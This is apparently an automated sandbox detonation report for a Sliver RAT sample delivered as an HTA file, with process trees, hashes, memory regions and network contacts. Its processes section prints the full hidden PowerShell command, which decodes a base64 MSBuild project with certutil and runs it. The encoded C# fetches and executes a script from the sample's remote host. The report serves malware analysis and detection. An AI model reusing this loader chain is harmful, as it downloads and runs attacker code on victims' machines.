SHA512 73a3a1049e9a682cd35316b48edc1a832943a16aa5bf3cfd25381f34d7f30677de6234c4c1ca1aad2345173146afa4c2a2e026e134fcb56e850264743c1ef6e2

memory/408-65-0x00000198CC250000-0x00000198CC258000-memory.dmp

memory/408-76-0x00000198E74A0000-0x00000198E74C2000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\oiaydg3g\oiaydg3g.cmdline

MD5 4c7530d0eaab0215c1344af377ac1eb9
SHA1 01946081e34b0d0de489a0fec2eae5898f0eb44f
SHA256 c86eb175130b3371d9b107749e1dcf79e195e65df9a7a72d4ede746cf8151f01
SHA512 870f090e8e0a3636b297071d51502957424a89786a7730e963e60b1cfd9cdfd0f77a6502712be21a5cd882ba87759f07f9006d35b3821b2644f472f574adc46d

\??\c:\Users\Admin\AppData\Local\Temp\oiaydg3g\oiaydg3g.0.cs

MD5 9dc0e32c32d7b3cfd2f819d8c0e4c7a5
SHA1 267cb8f96e02e298033786efd8ee6d87a73418a3
SHA256 67bc3e11493360528ba1296980ab818bf4c3938d14ddd6b5063bba03667b28ac
SHA512 c41e6c862933bed65c892b6cc89765a63ae936bdcb7a0499e0b1bd57d2a1d710dd66acb58fa7a7ffbef8a339fe647ccae85f6fdac3e7e7657472576a979a14b0

\??\c:\Users\Admin\AppData\Local\Temp\oiaydg3g\CSCD8E0469648454CA48B693F4F20AB42A2.TMP

MD5 2a8ef291fe271e5f63618cea93340f30
SHA1 409b95b3d8bcc59056934aa83aa557ea6ba8a0a2
SHA256 ff53d0f527949cfed8a4ff80a404a6df5b96294329ce5ebf90201166fe714926
SHA512 75f527df790c12c38bf4c754d5ec7d758c19a8c45cc24bf0892f549ac30dc578ec14f6989951446623debcfd071ebaa7f797f29762f23589b41ebe38074078bd

C:\Users\Admin\AppData\Local\Temp\RES7196.tmp

MD5 d3d6715508aff9aaf3a9af18a46d3b3e
SHA1 438e1e7f48f909b01a8e0d2b45e7088e4ea3c597
SHA256 029089cf9b556af519e881cfe3d205b62814620364a5021d79f3da3b6045f8cf
SHA512 53f4a0f952f745fab78f589df9662e93d313083a13e58a6e8b746cf7ceea600a0c1dbacd1b9cf51c5f77940052a7c057f1c1119862562202377bc3d527bd7858

C:\Users\Admin\AppData\Local\Temp\oiaydg3g\oiaydg3g.dll

MD5 d0c0d76869ab19056ab9790b4032d147
SHA1 394f8d478310149eb6129bc012646146c57f257d
SHA256 46a90e37fe32cf3cbbb41e2bc3d266a7e82c9c94b80f8255668319c55afc9104
SHA512 17d16c57f9e7352acc6854276c554b370b42989ebef1e4304d845f117b32d8b07164460d9ea1b139164144070be6010c151e89c3c1f7d9159ffad137868bf82c

memory/408-89-0x00000198CC2B0000-0x00000198CC2B8000-memory.dmp

memory/2780-91-0x0000000074FEE000-0x0000000074FEF000-memory.dmp

memory/2780-92-0x0000000074FE0000-0x0000000075790000-memory.dmp

memory/408-93-0x00000198E74D0000-0x00000198E7F4B000-memory.dmp

memory/408-94-0x00000198E89D0000-0x00000198E94B4000-memory.dmp

memory/408-96-0x00000198E89D0000-0x00000198E94B4000-memory.dmp

memory/408-97-0x00000198E89D0000-0x00000198E94B4000-memory.dmp

memory/408-95-0x00000198E89D0000-0x00000198E94B4000-memory.dmp

memory/408-99-0x00000198E89D0000-0x00000198E94B4000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-07 02:22

Reported

2024-11-07 02:25

Platform

win7-20240903-en

Max time kernel

117s

Max time network

149s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta"

Signatures

Sliver RAT v2

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sliver family

sliver

SliverRAT

trojan backdoor sliver

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\certutil.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\certutil.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2668 wrote to memory of 2804 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 2804 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 2804 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 2804 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2804 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 2804 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 2804 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 2804 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 2804 wrote to memory of 2608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 2804 wrote to memory of 2608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 2804 wrote to memory of 2608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 2804 wrote to memory of 2608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 2608 wrote to memory of 2068 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2608 wrote to memory of 2068 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2608 wrote to memory of 2068 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2068 wrote to memory of 2428 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2068 wrote to memory of 2428 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2068 wrote to memory of 2428 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2608 wrote to memory of 1468 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2608 wrote to memory of 1468 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2608 wrote to memory of 1468 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1468 wrote to memory of 2644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1468 wrote to memory of 2644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1468 wrote to memory of 2644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2608 wrote to memory of 1988 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2608 wrote to memory of 1988 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2608 wrote to memory of 1988 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1988 wrote to memory of 1656 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1988 wrote to memory of 1656 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1988 wrote to memory of 1656 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPg0KICA8IS0tIFRoaXMgaW5saW5lIHRhc2sgZXhlY3V0ZXMgYyMgY29kZS4gLS0+DQogIDwhLS0gQzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29yazY0XHY0LjAuMzAzMTlcbXNidWlsZC5leGUgcHNoZWxsLnhtbCAtLT4NCiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4NCiAgPCEtLSBMaWNlbnNlOiBCU0QgMy1DbGF1c2UgLS0+DQogIDxUYXJnZXQgTmFtZT0iSGVsbG8iPg0KICAgPEZyYWdtZW50RXhhbXBsZSAvPg0KICAgPENsYXNzRXhhbXBsZSAvPg0KICA8L1RhcmdldD4NCiAgPFVzaW5nVGFzaw0KICAgIFRhc2tOYW1lPSJGcmFnbWVudEV4YW1wbGUiDQogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSINCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4NCiAgICA8UGFyYW1ldGVyR3JvdXAvPg0KICAgIDxUYXNrPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtLklPIiAvPg0KICAgICAgPENvZGUgVHlwZT0iRnJhZ21lbnQiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICAgICAgICAgIENvbnNvbGUuV3JpdGVMaW5lKCJIZWxsbyBGcm9tIEZyYWdtZW50Iik7DQogICAgICAgIF1dPg0KICAgICAgPC9Db2RlPg0KICAgIDwvVGFzaz4NCiAgICA8L1VzaW5nVGFzaz4NCiAgICA8VXNpbmdUYXNrDQogICAgVGFza05hbWU9IkNsYXNzRXhhbXBsZSINCiAgICBUYXNrRmFjdG9yeT0iQ29kZVRhc2tGYWN0b3J5Ig0KICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPg0KICAgIDxUYXNrPg0KICAgICAgPFJlZmVyZW5jZSBJbmNsdWRlPSJTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uIiAvPg0KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICANCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbTsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOw0KICAgICAgICAgICAgLy9BZGQgRm9yIFBvd2VyU2hlbGwgSW52b2NhdGlvbg0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLk9iamVjdE1vZGVsOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2VzOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlRleHQ7DQogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOw0KICAgICAgICAgICAgdXNpbmcgTWljcm9zb2Z0LkJ1aWxkLlV0aWxpdGllczsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIHB1YmxpYyBjbGFzcyBDbGFzc0V4YW1wbGUgOiAgVGFzaywgSVRhc2sNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIFN0cmluZyBjbWQgPSBAIihOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vc2VjdXJlLmNsb3VkdGVjaG5vbG9naWVzdXNhLmNvbTo4MDgxL3VwZGF0ZS50eHQnKSB8IGlleCI7DQogICAgICAgICAgICBSdW5zcGFjZSBycyA9IFJ1bnNwYWNlRmFjdG9yeS5DcmVhdGVSdW5zcGFjZSgpOw0KICAgICAgICAgICAgcnMuT3BlbigpOw0KICAgICAgICAgICAgUG93ZXJTaGVsbCBwcyA9IFBvd2VyU2hlbGwuQ3JlYXRlKCk7DQogICAgICAgICAgICBwcy5SdW5zcGFjZSA9IHJzOw0KICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7DQogICAgICAgICAgICBwcy5JbnZva2UoKTsNCiAgICAgICAgICAgIHJzLkNsb3NlKCk7DQogICAgICAgICAgICByZXR1cm4gdHJ1ZTsNCiAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgDQogICAgICAgICAgICANCiANCiAgICAgICAgICAgIA0KICAgICAgICBdXT4NCiAgICAgIDwvQ29kZT4NCiAgICA8L1Rhc2s+DQogIDwvVXNpbmdUYXNrPg0KPC9Qcm9qZWN0Pg== > c:\windows\temp\enc3.txt;certutil -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\windows\temp\d.xml

C:\Windows\SysWOW64\certutil.exe

"C:\Windows\system32\certutil.exe" -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe" C:\windows\temp\d.xml

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rap5hawp\rap5hawp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA08.tmp" "c:\Users\Admin\AppData\Local\Temp\rap5hawp\CSCF26624058E1A4BB384F3E2C5E5C567FF.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uvr1odp3\uvr1odp3.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB9E.tmp" "c:\Users\Admin\AppData\Local\Temp\uvr1odp3\CSCCC4078AC4EA14897A4C1BE2CD61C744F.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q34g0sfo\q34g0sfo.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB85.tmp" "c:\Users\Admin\AppData\Local\Temp\q34g0sfo\CSCDC5E0A422F0046288051387835E2983E.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 secure.cloudtechnologiesusa.com udp
US 23.239.28.166:8081 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:8080 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp

Files

\??\c:\windows\temp\enc3.txt

MD5 940ed0fa0b1fc8ed6fbf279ab67af56f
SHA1 da4b7c40029542659f025ae74fa0be0fb0fa473c
SHA256 731673720695df22b838e0d256f7506eaa4c7570601db0a409302ab3a0cd1686
SHA512 934e3c5ee3b225ab0d686310a435865880b6c59f4885bb93cca814e8354456de3231364d3aa5cb6bc3c4472e6e6539da719c2b214e998e9e5773cca02f7d14ae

memory/2608-5-0x000000013F3D0000-0x000000013F40E000-memory.dmp

memory/2608-6-0x0000000000140000-0x000000000015A000-memory.dmp

memory/2608-7-0x000000001ADE0000-0x000000001AF3A000-memory.dmp

C:\windows\temp\d.xml

MD5 6c2a8d820d8d80182aacdc125399cd71
SHA1 51ccd1e0c3247bf24da813a1f660a367f8deefc8
SHA256 104291eb54874a1e80375b91ec552efac6632272654c8a5613730bd2eba9e78a
SHA512 c7c825a9b237850f6d087a449baaeed4e671db91b3db078586e322e992cb26efdb24d0ff8b365291ff58c3786dc563a62c4cbdcb81cecd95027606ef6fffd8c3

memory/2608-9-0x000000001C2E0000-0x000000001C402000-memory.dmp

memory/2608-10-0x000000001C860000-0x000000001C982000-memory.dmp

memory/2608-11-0x00000000005F0000-0x0000000000634000-memory.dmp

memory/2608-12-0x00000000008B0000-0x00000000008F4000-memory.dmp

memory/2608-13-0x00000000008B0000-0x00000000008CA000-memory.dmp

memory/2608-14-0x000000001C2E0000-0x000000001C45A000-memory.dmp

memory/2608-15-0x000000001D2C0000-0x000000001D624000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\rap5hawp\rap5hawp.cmdline

MD5 7f7ea98b7ffefa4148339e022deb1421
SHA1 f45f37a4cf471a061a103e2eeb8ebbfc9beaa88f
SHA256 a1a3b9ae46c66e548cb34772fe28f0ebc7b4bd00099f18f95b9e99cfab2dd5b1
SHA512 931b879bbe85d9979e9b529fe3d55b236b40f0b66b0c8a57920f6cb426d6711c17d6b50407552b41127d838cef05688df50ff5defdec2c814b3349f9dbca177b

\??\c:\Users\Admin\AppData\Local\Temp\rap5hawp\rap5hawp.0.cs

MD5 4a4ff4a5e71cabe4864c862a697c1e27
SHA1 b95fb7438213c3ae9caf0e8b52bb301fefcddb56
SHA256 70e3eb02311312b3f1ff90617cb47ebb9b8e7cab47771668811a34584182c6bb
SHA512 7c9257e5f23e2c378f47cb3bdced440d07bf96575a10883e59e0a0b4d8834b0ab3a43e4b850f48e2538021d2b352d732fc93f81277bcc20c45b070dc56bdcff5

\??\c:\Users\Admin\AppData\Local\Temp\rap5hawp\CSCF26624058E1A4BB384F3E2C5E5C567FF.TMP

MD5 975f3db8ad310f8d07485ba6057627e6
SHA1 cce9dd7d85017ffe31754fbdecf123a63ad808f6
SHA256 c7b56885f11e8cbadcf0dec084d735f6ef99efa3b9b385a6f8715c911e1a6468
SHA512 8d9101d42d27cff6e494864637da73806154d1dd7539cc65e6872e12af6137a24b2bde904e306168e5b3366f25d9c8cbaad96ec9603e2bbf1b67d523bfb89cdd

C:\Users\Admin\AppData\Local\Temp\RESFA08.tmp

MD5 059d763978f44394a96d790ad381d627
SHA1 84de0891b9d1a612a43329f4b4fa89c942c20f47
SHA256 2f43601dd30182474d7bece67a2dfc1e3cd6f330b63265052939e29067222111
SHA512 7df372ee7681acc29c3ccd9296978d203f8b341e1ecbdf7132a3d72d94e6dd5c683299a90363d34aae41824789125907d2941e483dfd465c2bb524318de97045

C:\Users\Admin\AppData\Local\Temp\rap5hawp\rap5hawp.pdb

MD5 f90a0868fac538a2e1774f077a60b787
SHA1 a0e8d2d95dd6d234bd306f2469a002f3ae1a8b16
SHA256 e183acb064d051a7b8ed45e55ba53b6d1fdaca056b73a12593ebe2af55ba88a0
SHA512 d2f3720ae12c930743886615016e8dbb3864231a6c7acc310509c79fb3b136302a33511e630f2a444ce8704167873c63c184bc20d0a735146b9341d65c0c47d9

C:\Users\Admin\AppData\Local\Temp\rap5hawp\rap5hawp.dll

MD5 6e6d7a9f1bfd1acf7fc9642cc26689d1
SHA1 5e5b061a5fd527d0abc579b007ddd3c79ebb6adb
SHA256 2fc27e006527cd3c08ace32420447c47f7404eee78ca10cf4b635166bd609ce8
SHA512 6f28086b9d486f1f1a22ed7ab3b2a63e3678784527bfa200cf8af084677eeda7616446ccbb1791f2478af5a405d8193428c710ca6579dabf5e556b90ff68fa8d

memory/2608-30-0x00000000008B0000-0x00000000008B8000-memory.dmp

memory/2608-32-0x000000001C2E0000-0x000000001C402000-memory.dmp

memory/2608-33-0x000000001E060000-0x000000001E342000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\uvr1odp3\uvr1odp3.cmdline

MD5 189b7ea288b96a9f01cba2cf2aa9d4ff
SHA1 32380e5f74f961044e172f3487e9f103e3016a92
SHA256 803f01022b445b4b603876e53b6b7af17bad6f703575566bf2fa0003614edd16
SHA512 bc5e7be4cd5111a16c9abb7b29509556d3801cc903e31b8dfb68864de60c60272e9d637b773c2699ff8123ceae0392361ae3a1880ff06bdcf81a946d1c73166f

\??\c:\Users\Admin\AppData\Local\Temp\uvr1odp3\uvr1odp3.0.cs

MD5 da1f4b7b1a87cc475dfa05923b6301a0
SHA1 0e2ff764c519bc8169b66437857f01e25676e343
SHA256 624fe16b05ade5d9929c6ecf16857939230ea32156405c18b4dacfb0448e310e
SHA512 d09603fd0e641122cc99ccf6c53bb93db7df2b52ed1cdd44d3e73d963a3e9fd12eb1918477c043ba39e2ae123071f2df98b9180eb2a533c01bbdbaab2563b53b

\??\c:\Users\Admin\AppData\Local\Temp\uvr1odp3\CSCCC4078AC4EA14897A4C1BE2CD61C744F.TMP

MD5 13b2b8337c041860a14830209cb53120
SHA1 87ee1495ad526e3b6ca041817f456b25d839165b
SHA256 87f90cd0a8588c37bb9ca26dcada8b5eda5de60d44b9e1e678c80aa463ab4319
SHA512 fd73168e1b6a7e53e7c7ed279b1e82a46fdf079333fbf2d9e292cd651d62d3393eddffa37a7403466068dcaeb1c9b6462abc28303f98c812c5fe9125ffa988eb

C:\Users\Admin\AppData\Local\Temp\RESFB9E.tmp

MD5 6f721db86ac76182ff58fb910c5fc239
SHA1 08680448b5ba8b8fdac1a328e19ef6eeabedc0c4
SHA256 06bcb64a29cf6a1e19900a545a42cd7eb02ac690ec5cccb3232909dc3a308aab
SHA512 b7bb8535b61a82e33a70961586349bbf9b4212c0f302b4bf6492c8f11e67b2ca8c32b8154375b4dc17890405672c4935796ae6de8b1cf8483611900305124423

C:\Users\Admin\AppData\Local\Temp\uvr1odp3\uvr1odp3.dll

MD5 114b1beeb338159cf8e10d252edf88c7
SHA1 35e52e4d532240156e9d67553c5c49f12056484e
SHA256 87dbf0b68a17d040d0214327badaf9e52a853bb39fed1dda970ffdf21916b883
SHA512 80b12face81b75a64d86f3e268eee55cf9eb9c8887d951fd7aea87cabe215ae2b4cd61bfff0451e4f9e44c5fd6edebee26de9329ac18879f52371066d1cfe010

C:\Users\Admin\AppData\Local\Temp\uvr1odp3\uvr1odp3.pdb

MD5 8e5d9e2a3d80b8bb75538a1a10866e0e
SHA1 930e6f5a91ce56cd53cbda562441fe4319ff300f
SHA256 5cfb07bab99cd1130285b1cb776832f2a7c7a0e47f88044d8925048f1a54a118
SHA512 113af6496ccc90e744d4711f82859a7910220aae04ec7507bc5f0238d77d5ec68b87a0b7df3c5e2572dc6d3e095378fbd853db3f85b1883151236129066253fa

memory/2608-48-0x00000000008C0000-0x00000000008C8000-memory.dmp

memory/2608-50-0x00000000008D0000-0x00000000008EC000-memory.dmp

memory/2608-51-0x0000000000A80000-0x0000000000AC8000-memory.dmp

memory/2608-52-0x00000000008F0000-0x00000000008F8000-memory.dmp

memory/2608-53-0x000000001BDB0000-0x000000001BE56000-memory.dmp

memory/2608-54-0x0000000002220000-0x0000000002254000-memory.dmp

memory/2608-55-0x0000000002260000-0x00000000022AA000-memory.dmp

memory/2608-56-0x0000000000AD0000-0x0000000000AE6000-memory.dmp

memory/2608-58-0x000000001C2E0000-0x000000001C402000-memory.dmp

memory/2608-57-0x000000001C2E0000-0x000000001C402000-memory.dmp

memory/2608-59-0x000000001E550000-0x000000001E60A000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\q34g0sfo\q34g0sfo.cmdline

MD5 d6bf783d5c8706d2fd004bd7ec151497
SHA1 cba5d782d2ff529c482f82676a5ab9ca8c493cc1
SHA256 ef7b625aa1fd1982b688a98eb869d15fbc684433b536aa5a27a1be057f1fb2f6
SHA512 38369968fdcfc0a7a91e9ee94e272aaa6072c9ddf8eaf3111279d1834d5d9855b249bcde60a6370f37a512d824bc2f888a95ae002b572ab7e7a6ab740f4c20d8

\??\c:\Users\Admin\AppData\Local\Temp\q34g0sfo\q34g0sfo.0.cs

MD5 9dc0e32c32d7b3cfd2f819d8c0e4c7a5
SHA1 267cb8f96e02e298033786efd8ee6d87a73418a3
SHA256 67bc3e11493360528ba1296980ab818bf4c3938d14ddd6b5063bba03667b28ac
SHA512 c41e6c862933bed65c892b6cc89765a63ae936bdcb7a0499e0b1bd57d2a1d710dd66acb58fa7a7ffbef8a339fe647ccae85f6fdac3e7e7657472576a979a14b0

C:\Users\Admin\AppData\Local\Temp\RESB85.tmp

MD5 b636d93d946eda16360d07ac4f32cb57
SHA1 185fa4c867b340e3b626b07b7da121fad583bbf4
SHA256 ef537566c040cdd0156c273971e5f2775ff7c35d609a8f9938030e9b06c7c463
SHA512 f9d800accdb5e7795415947461b2171925574f60f24344c3b3e0051f03b5b7fb72ca8848ffe673688498bdfbed67514e62878b440bf88377447254470f4c456f

\??\c:\Users\Admin\AppData\Local\Temp\q34g0sfo\CSCDC5E0A422F0046288051387835E2983E.TMP

MD5 e1311619232894838c587e794d5a9f2c
SHA1 4dbeeeb7662e00f32d8ad8eab5dda3056cf10c73
